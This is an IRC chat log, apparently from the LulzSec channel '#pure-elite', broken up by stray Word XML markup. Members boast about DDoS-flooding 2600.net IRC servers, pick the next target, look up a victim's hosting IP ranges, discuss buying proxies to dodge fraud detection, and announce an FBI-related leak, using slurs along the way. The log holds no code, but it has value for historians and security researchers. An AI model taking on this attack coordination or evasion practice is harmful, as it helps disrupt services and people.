joepie91 Topiary * Jun 03 16:52:55 joepie91 write a fucking book Jun 03 16:52:58 joepie91 I'm serious Jun 03 16:52:58 storm Jun 03 16:52:58 joepie91 lol Jun 03 16:53:02 storm yeah dude lofl Jun 03 16:53:38 storm 700 seconds to completely down that server. on both of them Jun 03 16:53:45 sabu lol\ Jun 03 16:53:49 storm thats with 200mbps though Jun 03 16:54:04 storm my gigabit was so ownage before i lost it Jun 03 16:54:06 storm :( RIP Jun 03 16:54:16 Topiary you guys have to just picture ourselves as an awesome boat crew, and storm is just chilling in that nest with a mounted rail gun scorching the living fuck out of incoming fleets Jun 03 16:54:17 storm shit downed servers in 200seconds Jun 03 16:54:33 storm rofl Jun 03 16:54:53 joepie91 Topiary Jun 03 16:54:56 joepie91 why is lulzsec not trending yet Jun 03 16:54:57 joepie91 on twitter Jun 03 16:55:02 Topiary :( because we lame Jun 03 16:55:07 storm trending how Jun 03 16:55:08 trollpoll lol Jun 03 16:55:16 Topiary twitter trending is rigged Jun 03 16:55:27 * tflow has quit (Ping timeout: 121 seconds) Jun 03 16:55:28 storm @LulzSec Im in irc.2600.net and everyone is dropping like flies. Also, did you see those threats by @AnonymousNL Jun 03 16:55:36 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 03 16:55:38 storm uh oh Jun 03 16:55:38 trollpoll the twitter algorithm is not for a long term topic...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:55:40 storm THREATZ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:56:01 Topiary the twitter trend system is based on mainstream "forgot what I was talking about yesterday" ADHD logic Jun 03 16:56:13 trollpoll yep Jun 03 16:56:17 Topiary just like 20-minute TV episodes Jun 03 16:56:22 trollpoll so, create a new hashtag Jun 03 16:56:31 Topiary #FuckFBIFriday Jun 03 16:56:32 trollpoll if you wanna be tt..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:56:32 Topiary is our current Jun 03 16:56:38 trollpoll lol Jun 03 16:56:46 storm it's funny though Topiary Jun 03 16:56:47 storm cause like Jun 03 16:56:52 storm if you read 2600's shit Jun 03 16:56:58 storm its like they're sucking up Jun 03 16:57:19 Topiary we should just tell them we'll DDoS them until they forbid Jester to chill there Jun 03 16:57:21 storm but yet they took our channels registery Jun 03 16:57:38 storm not even that, i'm more pissed about the channel being taken over Jun 03 16:57:41 storm thats bunk as hell Jun 03 16:57:48 storm admins dont do that lame shit Jun 03 16:58:14 storm uh oh Jun 03 16:58:19 storm i think i nulled their server Jun 03 16:58:41 Topiary pity, looks like they lost another frigate Jun 03 16:58:54 joepie91 lool Jun 03 16:58:56 storm i really did bust its null cherry i guess Jun 03 16:59:01 storm cause i didnt null it last night Jun 03 16:59:10 Topiary it capsized Jun 03 16:59:17 Topiary not getting drained for at least 7 minutes Jun 03 16:59:24 Topiary then more flood?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 16:59:27 storm sure Jun 03 16:59:35 storm djslocker.2600.net next Jun 03 16:59:39 * tflow has quit (Ping timeout: 121 seconds) Jun 03 16:59:55 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 03 17:00:32 sabu http://www.youtube.com/watch?v=u6LgIWr47LQ = hhahhahahha watch them get on the black guy Jun 03 17:01:02 joepie91 is Awinee SERIOUSLY still tweeting to you guys? Jun 03 17:01:07 joepie91 he sad he is getting ignored?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 17:01:19 sabu yeah hes gay Jun 03 17:01:20 sabu ..win 2 Jun 03 17:01:35 joepie91 Quote #1171: "joepie91 they could make the Regulatory Agency of E-Porn (RAEP) and I would care less" (added by Spoonzy at 01:37 AM, April 02, 2011) Jun 03 17:01:40 joepie91 effexor \o/ Jun 03 17:04:08 storm its back up now Jun 03 17:04:10 storm and rofl sabu Jun 03 17:04:21 storm this videos funny Jun 03 17:08:05 joepie91 storm Jun 03 17:08:09 joepie91 where is collective hosted?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 17:08:28 storm Host Virtual, Inc VR-208-111-35-0-24 (NET-208-111-35- 0-1) 208.111.35.0 - 208.111.35.255 Jun 03 17:08:43 storm VR HOSTED VRHOS-ARIN-19-0002 (NET-208-111-32-0-1) 208.111.32.0 - 208.111.47.255 Jun 03 17:10:25 * Topiary has changed the topic to: pE | Research and exploit development | Coding, designing, penetrating, packeting, laughing at our crippled opponents Jun 03 17:10:34 joepie91 @MrEGrizzly Jun 03 17:10:34 joepie91 Mr. E Grizzly Jun 03 17:10:34 joepie91 @LulzSec 504 error on WWW.lulzsecurity.com Jun 03 17:10:34 joepie91 3 minutes ago via Twitter for Android Jun 03 17:10:45 * lol has quit (A TLS packet with unexpected length was received.) Jun 03 17:10:48 Topiary nope it's up joepie Jun 03 17:10:54 storm its not up for me Jun 03 17:10:58 storm hasnt been Jun 03 17:11:05 Topiary I guess it's still down in a few areas Jun 03 17:11:32 joepie91 give me a sec Jun 03 17:11:34 joepie91 I think...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 17:11:37 joepie91 we are getting too much traffic Jun 03 17:11:37 joepie91 lol Jun 03 17:11:56 pwnsauce FFS Jun 03 17:12:07 * lol (parr0t@HA-i98.11n.cc0br2.IP) has joined #pure-elite Jun 03 17:12:20 joepie91 ohwait Jun 03 17:12:21 joepie91 that was 503 Jun 03 17:12:27 joepie91 504 is just a cloudflare bork Jun 03 17:12:38 joepie91 ED had the issue with too much traffic Jun 03 17:12:42 joepie91 ED was too big for cloudflare o_O Jun 03 17:12:58 joepie91 as in, there were errors because there were so many requests a second, the servers couldn't handle it Jun 03 17:13:03 Topiary apparently we're handling 50-100 legit requests a second Jun 03 17:16:45 joepie91 ye, it's not capacity faill Jun 03 17:16:48 joepie91 fail* Jun 03 17:16:49 * tflow has quit (A TLS packet with unexpected length was received.) Jun 03 17:16:52 joepie91 there seem to be issues with cloudflare Jun 03 17:16:58 joepie91 someone else gets connection refused Jun 03 17:17:05 joepie91 so I suppose cloudflare has to fix their shit Jun 03 17:17:20 joepie91 with anonnews, ED, and lulzsec... they've probably been handling a bit more traffic lately :D Jun 03 17:18:25 pwnsauce true dat Jun 03 17:19:43 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 03 17:31:03 storm hmm Jun 03 17:31:10 storm looks like others are taking after us Jun 03 17:31:14 storm and ddosing collective Jun 03 17:31:16 storm cause im not Jun 03 17:31:25 storm [17:31] [+sillygooth(+i)] [2:collective/#2600(+lmnt)] [Lag: 32 (??)] Jun 03 17:31:57 storm their ddos is slow though Jun 03 17:39:19 sabu yeah Jun 03 17:39:25 sabu thats some laerm Jun 03 17:39:26 sabu lamer Jun 03 17:39:31 storm lol Jun 03 17:39:33 storm isnt me!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 17:40:08 joepie91 anyone feels like playing age of empires 2 Jun 03 17:40:12 joepie91 in multiplayer Jun 03 17:40:15 joepie91 with me and a friend?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 17:40:19 storm aoe sucks Jun 03 17:40:19 storm well Jun 03 17:40:22 storm i suck at aoe Jun 03 17:40:26 joepie91 lol Jun 03 17:40:44 storm i play another multiplayer game from the 90's Jun 03 17:40:54 joepie91 no but srsly Jun 03 17:41:00 joepie91 we are trying to get a 2v2 going Jun 03 17:41:03 joepie91 but missing player ;_; Jun 03 17:41:03 storm 2d overhead capture the flag/strategic game Jun 03 17:41:04 storm xD Jun 03 17:41:11 Topiary storm: you ever play on the Dreamcast?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 17:41:19 storm yeah when i was a kid Jun 03 17:41:25 Topiary I still have one Jun 03 17:41:29 storm haha Jun 03 17:43:01 * trollpoll has quit (Quit: Leaving) Jun 03 17:44:36 sabu yo stormsex Jun 03 17:44:43 sabu dont waste no more resources on 2600 Jun 03 17:44:45 sabu save your boxes Jun 03 17:44:50 sabu we'll have another target Jun 03 17:45:53 storm ok Jun 03 17:45:57 storm will do broski Jun 03 17:45:59 storm :) Jun 03 17:46:09 storm rebooting to go play that game in the aforementioned Jun 03 17:46:14 storm afk guiz Jun 03 17:46:15 sabu kk Jun 03 17:46:18 sabu thx bro Jun 03 17:46:18 pwnsauce kk Jun 03 17:46:21 storm &lt;3 sabu Jun 03 17:46:25 storm laters Jun 03 17:46:29 * storm detached Jun 03 18:31:53 * lol has quit (A TLS packet with unexpected length was received.) Jun 03 18:31:55 * lol (parr0t@HA-bdi.9ck.dqsjqe.IP) has joined #pure-elite Jun 03 18:37:35 * pwnsauce has quit (Ping timeout: 121 seconds) Jun 03 18:44:27 * lol has quit (A TLS packet with unexpected length was received.) Jun 03 18:44:35 * lol (lol@HA-s5h.ho4.fu85s5.IP) has joined #pure-elite Jun 03 18:58:59 * Palladium (Palladium@HA-kd2.1lr.tbgr2g.IP) has joined #pure-elite Jun 03 18:59:47 &lt;palladium&gt; Hi Jun 03 19:02:04 lol hi :D Jun 03 19:17:46 * Palladium has quit (Quit: Lost terminal) Jun 03 19:24:01 sabu hi Jun 03 19:25:48 [redacted] hi Jun 03 19:26:47 * Palladium (Palladium@HA-kd2.1lr.tbgr2g.IP) has joined #pure-elite Jun 03 19:26:54 &lt;palladium&gt; Hi Jun 03 19:28:34 sabu hi Jun 03 19:28:38 sabu what up niggles Jun 03 19:29:50 [redacted] can i haz op Jun 03 19:30:28 [redacted] joepie91- I love AoE 2 :D Jun 03 19:30:31 * Sabu gives channel operator status to [redacted] Jun 03 19:30:33 * Sabu gives channel operator status to Palladium Jun 03 19:30:45 * Sabu gives channel operator status to tflow Jun 03 19:30:46 * Sabu gives channel operator status to lol Jun 03 19:40:20 * joepie91 has quit (Ping timeout: 121 seconds) Jun 03 19:47:34 * Palladium has quit (Quit: Lost terminal) Jun 03 19:54:52 * joepie91 (joepie91@HA-u3g.pbq.j3hiks.IP) has joined #pure- elite Jun 03 19:57:18 joepie91 well fuck Jun 03 19:57:22 joepie91 AoE crashed my entire pc Jun 03 19:57:23 joepie91 :| Jun 03 19:57:31 joepie91 did I miss anything?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 19:59:11 tflow no Jun 03 19:59:13 tflow you're in time Jun 03 19:59:17 tflow for fuckfbi Jun 03 19:59:22 tflow going to release in a few mins Jun 03 19:59:32 tflow but we can't upload it to tpb because tpb upload is borked Jun 03 19:59:43 tflow so we just have to do a plain .torrent file Jun 03 19:59:50 tflow :&lt; Jun 03 20:00:11 joepie91 oh Jun 03 20:00:17 joepie91 let me log on frm lapy Jun 03 20:00:19 joepie91 lappy* Jun 03 20:00:24 joepie91 on what domain can I reach this server/ Jun 03 20:00:26 joepie91 derp Jun 03 20:00:28 joepie91 ?* Jun 03 20:00:41 joepie91 hanging over keyboard typing sideways =/= success Jun 03 20:01:31 tflow this irc?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:01:35 tflow there's no domain afaik Jun 03 20:03:44 joepie91 well Jun 03 20:03:45 joepie91 derp Jun 03 20:03:54 joepie91 let me manually type the ip then :P Jun 03 20:05:06 * tflow has quit (A TLS packet with unexpected length was received.) Jun 03 20:05:27 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 03 20:06:05 * joepie92 (joepie91@HA-u3g.pbq.j3hiks.IP) has joined #pure- elite Jun 03 20:06:11 * joepie92 is now known as joepie91_laptop Jun 03 20:06:12 joepie91_laptop ohaithar Jun 03 20:06:26 joepie91_laptop lulz from bed :D Jun 03 20:06:55 tflow same Jun 03 20:17:01 joepie91_laptop http://postimage.org/image/2nzrr8f44 Jun 03 20:17:28 tflow that's pretty old Jun 03 20:20:23 joepie91_laptop b14ck4dd3r == SanguineRose?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:20:31 joepie91_laptop writing style somewhat matches Jun 03 20:20:40 joepie91_laptop and yes I know it's old, just hadn';t seen the picture before :P Jun 03 20:22:00 joepie91_laptop also Jun 03 20:22:15 joepie91_laptop apparently lulzsec has inspired people to use both cloudflare and bitcoin Jun 03 20:22:35 joepie91_laptop Topiary: for added win, get Cloudflare to accept Bitcoins for their Pro package Jun 03 20:28:56 joepie91_laptop @attritionorg Jun 03 20:28:56 joepie91_laptop attrition.org Jun 03 20:28:56 joepie91_laptop @securitygen does @CloudFlare still fail to protect a site if you attack it using IP instead of DNS name?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:29:00 * joepie91_laptop facepalms Jun 03 20:29:23 * Neuron (Neuron@HA-t6n.62t.o0m95d.IP) has joined #pure- elite Jun 03 20:29:28 neuron o/ hey gusy Jun 03 20:30:03 sabu hi sexypie Jun 03 20:30:41 neuron hey baby want a good time?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:30:44 * Neuron shakes ass Jun 03 20:31:11 joepie91_laptop Neuron Jun 03 20:31:12 joepie91_laptop hai Jun 03 20:31:14 sabu doing new lelak now Jun 03 20:31:19 neuron whats the leak?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:31:27 neuron i logged on :P im not sure what FuckFBIFriday is Jun 03 20:31:32 joepie91_laptop Neuron, can you pm the non-cinfu socks to joepie91 (my desktop) again?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:31:35 joepie91_laptop I might need it :P Jun 03 20:31:47 neuron joepie91_laptop: i no longer have a non cinfu socks i canceled it :P Jun 03 20:31:51 joepie91_laptop oh Jun 03 20:31:53 joepie91_laptop :| Jun 03 20:31:56 neuron all mine are cinfu :( Jun 03 20:32:01 neuron ill work on getting more Jun 03 20:32:05 joepie91_laptop where did you register them from Jun 03 20:32:06 joepie91_laptop the cinfus Jun 03 20:32:06 neuron Sabu: we in 2600?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:32:12 joepie91_laptop because I got caught by maxmind today &gt;.&gt; Jun 03 20:32:15 sabu http://infragardatlanta.org/ Jun 03 20:32:18 sabu no. neuron.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:32:21 sabu stay away from there Jun 03 20:32:40 neuron Sabu: was just asking. If we were i was just gonna work on socialing Jun 03 20:33:06 tflow check twitter feed Jun 03 20:33:08 neuron joepie91_laptop: you have to register from the same place your ip is Jun 03 20:33:10 tflow we just released Jun 03 20:33:11 tflow :&gt; Jun 03 20:33:29 joepie91_laptop I know Jun 03 20:33:30 joepie91_laptop I did Jun 03 20:33:35 joepie91_laptop got busted for open proxy &gt;.&gt; Jun 03 20:33:39 neuron lmfao Jun 03 20:33:46 neuron send me 1bc and ill order one for you Jun 03 20:33:49 joepie91_laptop so I need something non-public Jun 03 20:33:50 joepie91_laptop ah Jun 03 20:33:52 joepie91_laptop thats ok too Jun 03 20:33:59 joepie91_laptop lemme get out of bed Jun 03 20:34:10 neuron rgr Jun 03 20:34:12 neuron whos tflow ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:34:38 tflow i've been here since the start of lulzsec, just not in this chan Jun 03 20:35:44 neuron ahh i see.. hi o/ im neuron the local keyboard cowboy *i code* Jun 03 20:36:36 joepie91 Neuron, check your pm for a sec so I can get back into bed Jun 03 20:36:38 joepie91 it's cold Jun 03 20:36:39 joepie91 :P Jun 03 20:36:43 tflow ah Jun 03 20:36:43 tflow nice Jun 03 20:36:48 neuron joepie91: check it :P Jun 03 20:37:55 * joepie91_laptop back into bed Jun 03 20:38:47 neuron Sabu: what servers did you end up buying?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:39:27 sabu hold on neuron Jun 03 20:39:28 sabu hop on twitter Jun 03 20:39:31 sabu watch it expose Jun 03 20:39:33 sabu explode Jun 03 20:39:50 neuron watching Jun 03 20:40:20 joepie91_laptop twitter is raping my laptop :( Jun 03 20:40:56 neuron its not so much raping me :/ Jun 03 20:41:07 neuron im searching fbi hacked Jun 03 20:41:22 joepie91_laptop guys Jun 03 20:41:23 joepie91_laptop please Jun 03 20:41:27 joepie91_laptop stop using spaces in filenames Jun 03 20:41:40 neuron joepie.... file\ space Jun 03 20:41:41 joepie91_laptop it breaks browsers, webservers, caching services, and a shitload of other shit Jun 03 20:41:49 neuron :P or %20 Jun 03 20:41:54 joepie91_laptop I know Jun 03 20:41:57 joepie91_laptop but they still tend to break shit Jun 03 20:42:04 joepie91_laptop I've often had unexplainable errors on webservers Jun 03 20:42:13 joepie91_laptop that were fixed by removing spaces Jun 03 20:43:11 joepie91_laptop 3.75 load average...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:43:12 joepie91_laptop :| Jun 03 20:45:47 &lt;hsien&gt; yoz Jun 03 20:45:51 neuron o/ Jun 03 20:48:19 &lt;hsien&gt; hows it Jun 03 20:49:45 joepie91_laptop 28.3 load average on a pentium 3 FUCK YEAH Jun 03 20:51:13 neuron brb need new ip Jun 03 20:51:14 * Neuron has quit (Quit: leaving) Jun 03 20:51:43 tflow what's anonops saying about this joepie91?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 20:52:29 * Neuron (Neuron@HA-875.col.tt2aeb.IP) has joined #pure- elite Jun 03 20:54:41 joepie91_laptop idk Jun 03 20:54:47 joepie91_laptop notlogged on from lappy Jun 03 20:55:01 joepie91_laptop lemme walk to my pc Jun 03 21:00:48 neuron joepie91_laptop: what os?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 21:01:07 joepie91 laptop = puppy linux Jun 03 21:01:24 joepie91 tflow: people seem to think lulzsec is win Jun 03 21:01:26 neuron no :P like what os for your box..</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>ubuntu,devian,centos,suse,fedora Jun 03 21:01:28 joepie91 haven;t read much yet Jun 03 21:01:31 joepie91 I'm tired Jun 03 21:01:32 joepie91 oh Jun 03 21:01:33 joepie91 derp Jun 03 21:01:41 * joepie91 saw laptop and OS in one sentence Jun 03 21:01:43 joepie91 debian of course Jun 03 21:01:45 joepie91 :D Jun 03 21:04:01 tflow http://pastebin.com/kixK4rfu Jun 03 21:04:13 tflow blackhat seo, trying to capitilize on lulzsec lol Jun 03 21:04:21 tflow but how the fk did it get 18k views Jun 03 21:06:47 joepie91_laptop tflow Jun 03 21:06:50 joepie91_laptop proxy view increaser Jun 03 21:06:53 joepie91_laptop or similar tools Jun 03 21:07:02 joepie91_laptop http://www.sven-slootweg.nl/downloads Jun 03 21:07:05 joepie91_laptop I have a really crappy one Jun 03 21:07:09 joepie91_laptop that I made for someone a long time ago Jun 03 21:08:07 neuron joepie91_laptop: check pm Jun 03 21:08:36 joepie91_laptop I know :P Jun 03 21:08:37 joepie91_laptop sec Jun 03 21:12:54 joepie91_laptop Sabu, tflow, Topiary Jun 03 21:12:55 joepie91_laptop &lt;cedr&gt;[18:06:30] &lt;cedr&gt; Fuck FBI Friday (FFF).rar is not RAR archive - ah well.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 21:12:56 joepie91_laptop &lt;cedr&gt;[18:06:52] &lt;cedr&gt; ohh Jun 03 21:12:56 joepie91_laptop &lt;cedr&gt;[18:06:55] &lt;cedr&gt; its a fucking .zip Jun 03 21:12:56 joepie91_laptop &lt;cedr&gt;[18:06:57] &lt;cedr&gt; fail Jun 03 21:12:56 joepie91_laptop &lt;cedr&gt;did they purposely name their zip archive .rar? :p Jun 03 21:13:27 tflow wat Jun 03 21:13:32 joepie91_laptop idk Jun 03 21:13:40 &lt;hsien&gt; dude weird Jun 03 21:13:41 tflow we've never uploaded any rar/zip archive Jun 03 21:13:48 &lt;hsien&gt; i owned a box named cedr Jun 03 21:13:48 joepie91_laptop it's the torrent Jun 03 21:13:55 joepie91_laptop also, if someone has a pastebin account or feels like making one... report that spam submission :D Jun 03 21:14:02 * Topiary trollface.bat Jun 03 21:14:09 joepie91_laptop lol Jun 03 21:14:11 joepie91_laptop Topiary Jun 03 21:14:13 Topiary I made a zip and called it rar because it trolls the shit out of faggots Jun 03 21:14:14 joepie91_laptop as I just said Jun 03 21:14:24 joepie91_laptop if you want epic over 9000 end boss bonus level points Jun 03 21:14:29 joepie91_laptop make cloudflare accept bitcoins Jun 03 21:14:31 joepie91_laptop for their Pro package Jun 03 21:14:50 joepie91_laptop :D Jun 03 21:40:32 * t[2] (t@HA-tbl.rkn.75e5ku.IP) has joined #pure-elite Jun 03 21:43:27 * Topiary has quit (Ping timeout: 121 seconds) Jun 03 21:44:31 * t[2] has quit (Quit: ==&gt;) Jun 03 21:45:03 * Topiary (t@HA-tbl.rkn.75e5ku.IP) has joined #pure-elite Jun 03 21:58:56 * tflow has quit (A TLS packet with unexpected length was received.) Jun 03 21:59:16 * tflow (tflow@HA-r12.0jd.4c0nch.IP) has joined #pure-elite Jun 03 22:02:53 joepie91_laptop wel Jun 03 22:02:59 joepie91_laptop I think it's time for me Jun 03 22:03:03 joepie91_laptop to meet with Mr. Dream Jun 03 22:03:06 joepie91_laptop goodnight all Jun 03 22:03:06 Recursion holy shit Jun 03 22:03:09 joepie91_laptop ?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 22:03:09 sabu hi Jun 03 22:03:10 Recursion wtf happened today?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 22:03:13 sabu a lot ;) Jun 03 22:03:13 joepie91_laptop lolol Jun 03 22:03:15 sabu check twitter Jun 03 22:03:16 sabu ROFL Jun 03 22:03:27 joepie91_laptop lulzsec declared war to the US?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 22:03:28 joepie91_laptop :P Jun 03 22:03:28 Recursion I caught the jist of it Jun 03 22:04:09 joepie91_laptop but really Jun 03 22:04:11 joepie91_laptop night guys Jun 03 22:04:18 Recursion g'night Jun 03 22:05:31 storm yo Jun 03 22:07:08 storm went swimming Jun 03 22:07:12 storm had some beers Jun 03 22:07:19 storm toked on my e cigarette Jun 03 22:07:22 storm good night man Jun 03 22:07:25 storm good night Jun 03 22:07:25 storm :D Jun 03 22:29:42 * Recursion has quit (Quit: leaving) Jun 03 22:29:54 sabu hi Jun 03 22:29:56 sabu well guys Jun 03 22:30:07 sabu those of you that are still with us through this Jun 03 22:30:22 sabu maintain alert, make sure you're behind vpns dont matter what Jun 03 22:30:32 sabu and dont fear Jun 03 22:30:33 sabu we're ok Jun 03 22:30:34 sabu w/i n2 Jun 03 22:43:27 neuron back Jun 03 22:43:37 sabu sup neuron Jun 03 22:44:15 neuron Sabu: did we lose people?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:28:15 storm agreed Jun 03 23:28:16 storm did we?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Jun 03 23:31:10 sabu yeah Jun 03 23:31:18 storm who?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
